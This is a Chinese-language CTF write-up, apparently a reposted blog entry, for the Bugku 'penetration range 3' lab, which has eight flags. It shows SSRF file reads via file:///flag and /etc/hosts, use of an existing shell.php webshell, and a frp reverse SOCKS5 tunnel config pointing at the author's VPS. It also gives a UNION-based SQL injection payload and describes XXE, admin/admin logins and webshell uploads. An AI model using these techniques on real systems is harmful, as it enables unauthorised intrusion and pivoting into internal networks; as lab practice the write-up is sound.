当前位置: 首页 > news >正文

bugku 渗透靶场3

前言

本题一共八个flag,主要是为了练习内网渗透的思路。

解题思路

首先给了一个站长之家-模拟蜘蛛爬取,这个以前见到过,存在sstf漏洞,直接读取文件。

file:///flag

image-20230401151523662

既然是要内网渗透,那肯定要看/etc/hosts。

file:///etc/hosts

image-20230401151604719

爆破192.168.0.2端口,发现存在192.168.0.10,是一个被黑的页面。

image-20230401151701056

尝试访问shell文件,发现shell.php可命令执行。

image-20230401151752137

想传入一句话木马连接蚁剑,首先需要内网穿透开启代理,利用wget将所需要的文件下载上去。

image-20230401151905244

然后启动frpc服务,需要先在vps上启动frps,代理连接后即可传入一句话木马来连接蚁剑。

命令:
vps ./frps -c frps.ini (先运行)
靶机 ./frpc -c frpc.ini

frpc.ini配置文内容

[common]
server_addr = vps
server_port = 7000[socks5]
type = tcp 
remote_port = 7001
plugin = socks5

image-20230401152328331

在html下和根目录下各有一个flag。

然后上传fscan扫描10.10.0.0/24和192.168.0.0/24。

192.168.0.138为分数查询系统,存在sql注入。

4 union select 1,2,3,(select+*+from+flag)#

在192.168.0.250中存在登录框,登录成功后并无回显,最后xxe尝试成功,在html下和根目录下各有两个flag。

image-20230401152851242

又在10.10.0.22中发现bugku管理页面,存在admin.php后台。

admin admin登陆成功。

发现有文件上传功能且没有过滤,可直接传入一句话木马,在html目录和根目录下各有两个flag。

image-20230401153217305
因为环境已经到时,不想再用20金币开启,所以后边写的较简略。

http://www.lryc.cn/news/45587.html

相关文章:

  • NER 任务以及联合提槽任务
  • scala函数式编程
  • 网吧2023:热闹回来了,电竞战歌起
  • 代码随想录算法训练营第五十九天|503.下一个更大元素II、42. 接雨水
  • 9、简单功能分析
  • 如何发送和接收参数?五种参数传递方法
  • 蓝桥杯C/C++VIP试题每日一练之矩形面积交
  • Spark大数据处理讲课笔记2.4 IDEA开发词频统计项目
  • 【ChatGPT 】国内无需注册 openai 即可访问 ChatGPT:ChatGPT Sidebar 浏览器扩展程序的安装与使用
  • 使用fetch()异步请求API数据实现汇率转换器
  • GPT-4“王炸”,10秒钟开发一套Web + APP 系统
  • Disjoint 集合数据结构或 Union-Find 算法简介
  • uniapp中nvue与vue的区别?
  • 带头双向循环链表的实现
  • 大屏使用dv-digital-flop定时刷新显示总人数
  • Java面向对象部分 个人学习记录
  • MySQL数据库——对Linux MySQL软件包的一些说明
  • 【JavaEE进阶】——第二节.Spring核心和设计思想
  • twitter开源算法(1)For You推荐系统架构
  • A General Framework for Uncertainty Estimation in Deep Learning源码阅读(二)
  • 串行通信协议---HART协议
  • 【独家】华为OD机试 - 寻找密码(C 语言解题)
  • FPGA有哪些优质的带源码的IP开源网站?
  • 基于模型预测控制(MPC)的微电网调度优化的研究(Matlab代码实现)
  • Postman接口测试之Mock快速入门
  • 分享一个国内可用的免费ChatGPT网站
  • 15. 三数之和(Java)
  • Navicat Premium 16安装教程
  • 蓝桥杯刷题冲刺 | 倒计时8天
  • 四.JAVA基础面试题:重要知识